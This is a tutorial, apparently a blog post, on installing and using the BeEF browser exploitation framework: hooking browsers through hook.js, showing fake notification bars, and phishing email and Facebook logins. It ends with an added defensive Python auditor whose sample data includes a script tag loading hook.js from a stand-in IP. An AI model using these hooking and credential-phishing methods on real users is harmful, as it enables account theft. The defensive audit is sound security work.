  • hamidullahbayram

Beef; yes it is, something edible, but not meat: The Browser Exploitation Framework (BeEF)


The Browser Exploitation Framework (BeEF) is a tool used mostly for honeypot and social engineering work in penetration testing. It takes advantage of weaknesses in web browser security. The victim connects to the BeEF server and is exposed to various attack scenarios. The victim's hooked browser remains exploitable by the BeEF server for as long as the victim is online, and the attacker can execute commands from the BeEF panel. This client-side attack tool started in 2006 as an open-source project.


Installation on Kali

apt install beef

apt install beef-xss

apt install beef-xss --fix-missing (if error occurs)


Type beef-xss to start


The login page opens automatically; enter the password you created during installation.

When you enter your creds with the default username “beef”, you’ll be directed to the BeEF panel.


BeEF provides demo servers to execute the commands for training; you may use either the first or the second:


Here it is; the browser appears hooked. Let’s check the Network Map.


There are lots of details about the target, such as browser info, plugins, OS, version…


The main idea is that we need the victim's vulnerable web browser to load the hook script (hook.js), which is JavaScript. BeEF already hosts a web page with executable payloads on our localhost in order to execute them.



Let’s execute basic samples…


We can execute a fake notification bar that may contain an embedded URL to an exploitable plugin.


It pops up on victim’s screen.


When the victim clicks on it to download, we get a result showing whether the payload is being downloaded.


Another command offers a good phishing method for capturing email creds.


The victim may see the original login page, and when s/he enters her/his creds, we immediately receive the result.


The same works for other social media: the page can be modified to match the original design, and we have successfully got the user’s Facebook creds.


Or we can display a text prompt on the victim’s screen to get sensitive data, or to get the target to click/type an intended link.




This training was practiced in an internal lab with an offline/demo browser, but it is a PoC that can also be performed and practiced publicly under a static IP or domain. So, BeEF’s hooking script can abuse a stored XSS (Cross-Site Scripting) vulnerability, which is still a relevant attack vector.
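Because the hook only works once a page makes the browser load hook.js, a site owner can audit stored user content for script tags that pull code from hosts the site never approved. The following is an added example, not part of the original post or of BeEF; the host allow-list, the function names and the sample rows are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: hosts this (hypothetical) site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}

class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a document."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so <SCRIPT SRC=...> matches too.
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())

def audit_stored_html(record_id, html, page_host):
    """Return one finding per script tag that loads code from an unapproved host."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        parts = urlsplit(src)
        host = parts.hostname or page_host  # relative URL means same origin
        if host in ALLOWED_SCRIPT_HOSTS:
            continue
        reason = "script loaded from unapproved host"
        if parts.path.lower().endswith("/hook.js"):
            reason += " (file name matches hook.js)"
        findings.append({"record": record_id, "src": src, "host": host, "reason": reason})
    return findings

# Constructed sample rows standing in for stored comments (record id -> HTML).
SAMPLE_COMMENTS = {
    101: "<p>Great post!</p>",
    102: '<p>Nice</p><script src="http://192.0.2.10:3000/hook.js"></script>',
    103: '<script src="/static/app.js"></script>',
    104: '<SCRIPT SRC="//cdn.shop.example/lib.js"></SCRIPT>',
}

def audit_all(rows, page_host="shop.example"):
    """Audit every stored row and return the combined list of findings."""
    return [f for rid, html in rows.items() for f in audit_stored_html(rid, html, page_host)]

if __name__ == "__main__":
    for finding in audit_all(SAMPLE_COMMENTS):
        print(finding)
```

The file name is only a hint, since a hook script can be served under any name; the allow-list check is what catches it, and the same list can be enforced in the browser with a Content-Security-Policy script-src directive.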



Thanks for reading.

